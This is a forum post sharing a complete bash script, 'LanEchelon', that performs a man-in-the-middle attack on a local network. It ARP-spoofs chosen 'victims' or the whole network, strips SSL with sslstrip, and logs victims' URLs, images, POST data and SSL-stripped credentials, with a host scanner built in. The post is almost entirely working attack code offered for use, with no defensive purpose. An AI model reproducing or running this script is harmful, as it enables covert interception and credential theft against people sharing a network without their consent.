My script - LanEchelon
Hi all
I decided to translate (my language is Polish) and put my script LanEchelon.
LanEchelon sniff: Traffic et al. pcap, url, images, post, post ssl.
Sorts the results in the logs.
It also has a scanner hosts.
Requirements:
Arpspoof - Package dsniff
SSlStrip
Driftnet
Ethercap
Tshark
ARP-Scan (old version in the repo, new - http://www.nta-monitor.com/tools/arp-scan/)
Maybe someone will like it.Code:#!/bin/bash #Do zrobienia: function pcap { if [ $NET = "yes" ] ; then sleep 1 elif [ $NET = "no" ] ; then for x in $CEL ; do tshark -r /root/$SESJA/*.cap -R "ip.addr == $x" -b filesize:92160 -w /root/$SESJA/$SESJA-$x.pcap done rm /root/$SESJA/*.cap fi } function listaurl { if [ $NET = "yes" ] ; then grep -v $MOJEIP /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url.txt elif [ $NET = "no" ] ; then for x in $CEL ; do grep $x /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url-$x.txt done fi rm /root/$SESJA/$SESJA.txt } function skanhost { echo arp-scan -l -I $IFEJS | grep -v $BRAMA | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/&/g' | cut -f 1,2,3,4 > /root/host.list if [[ -s host.list ]] ; then echo -e "\e[01;33m[!]\e[00m List of active hosts \e[02;37m(IP,MAC,CARD MANUFACTURERJ)\e[00m:" echo echo ---------------------------------------------------------------------------- echo -e "\e[1;32m`cat /root/host.list`\e[00m" echo ---------------------------------------------------------------------------- echo else echo echo -e "\e[01;33m[!]\e[00m There are no active hosts..." echo fi } function ipinfo { MOJEIP=`ifconfig $IFEJS | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'` MASKA=`ifconfig $IFEJS | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4` BRAMA=`route -n | grep $IFEJS | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2` echo echo -e "\e[01;33m[!]\e[00m Data network interface \e[01;34m$IFEJS\e[00m:" echo echo -e "\e[02;35m GATEWAY: \e[00m$BRAMA" echo -e "\e[02;35m YOUR IP: \e[00m$MOJEIP" echo -e "\e[02;35m SUBNET MASK: \e[00m$MASKA" echo } clear echo echo ---------------------------------------------------------- echo -e "| @?$\e[01;38m>>>>>>>\e[00m}LanEchelon Script{\e[01;38m<<<<<<<\e[00m@?$ |" echo ---------------------------------------------------------- echo -e "| \e[02;37msniff: traffic in .pcap, url, images, post, ssl post\e[00m |" echo ---------------------------------------------------------- echo -e "| autor: \e[01;34mnum3r\e[00m version: \e[01;34m1.0\e[00m |" echo ---------------------------------------------------------- echo echo echo -e "\e[01;32m[+]\e[00m Starting procedure..." echo echo echo -ne "\e[01;38m[>]\e[00m Please enter a name for the session: " read -e SESJA echo -ne "\e[01;34m[>]\e[00m Save the entire network traffic in .pcap?? (yes/no): " read -e RUCH echo -ne "\e[01;38m[>]\e[00m Save the captured images?? (yes/no): " read -e GRAFIKA echo -ne "\e[01;34m[>]\e[00m Enable option to two-way ARPspoofing?? (yes/no): " read -e ARP echo -ne "\e[01;38m[>]\e[00m Enter the name of the network interface, np. wlan0: " read -e IFEJS ipinfo echo -ne "\e[01;34m[>]\e[00m Start scanning active hosts on the network?? (yes/no): " read -e SKAN if [ $SKAN = "yes" ] ; then skanhost fi echo -ne "\e[01;38m[>]\e[00m Attack the whole network?? (tak/nie): " read -e NET if [ $NET = "yes" ] ; then sleep 1 else echo -ne "\e[01;34m[>]\e[00m Enter the IP address(-es) of the victim(-s) (separate space): " read -e CEL fi echo echo echo -e "\e[01;32m[+]\e[00m Starting attack...(press q to exit the script)" sleep 2 echo mkdir /root/$SESJA/ iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo "1" > /proc/sys/net/ipv4/ip_forward sslstrip -p -f -k -w /root/$SESJA/$SESJA-ssl.log & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 sleep 1 urlsnarf -i $IFEJS | grep http > /root/$SESJA/$SESJA.txt & sleep 1 xterm -geometry 105x15+1+1 -bg black -fg green -T "SSL Log" -s -sb -si +sk -sl 5000 -e tail -f /root/$SESJA/$SESJA-ssl.log & if [ $GRAFIKA = "yes" ] ; then mkdir /root/$SESJA/images/ xterm -geometry 75x15+650+1 -bg black -fg blue -T "Images" -s -sb -si +sk -sl 5000 -e driftnet -i $IFEJS -p -a -d /root/$SESJA/images & sleep 1 else sleep 1 fi if [ $NET = "yes" ] && [ $RUCH = "yes" ]; then xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA & sleep 1 ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA elif [ $NET = "yes" ] && [ $RUCH = "no" ]; then xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA & sleep 1 ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA fi for x in $CEL ; do if [ $NET = "yes" ] && [ $ARP = "no" ]; then xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA & sleep 1 xterm -geometry 100x6+1+605 -bg black -fg yellow -T "ARPspoof 2" -e arpspoof -i $IFEJS -t $BRAMA $x & sleep 1 elif [ $NET = "no" ] && [ $ARP = "no" ]; then xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA & sleep 1 fi done if [ $NET = "no" ] && [ $RUCH = "yes" ]; then ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA elif [ $NET = "no" ] && [ $RUCH = "yes" ]; then ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA fi echo echo -e "\e[01;32m[+]\e[00m Stopping attack..." echo killall -q -w arpspoof killall -q -w xterm killall -q -w sslstrip killall -q -w urlsnarf killall -q driftnet killall -q -w python listaurl if [ $RUCH = "yes" ] ; then pcap else sleep 1 fi rm /root/host.list iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo "0" > /proc/sys/net/ipv4/ip_forward echo echo echo -e "\e[01;32m[+]\e[00m Procedure completed..." echo -e "\e[01;32m[+]\e[00m See you later..." echo exit
Best Regards
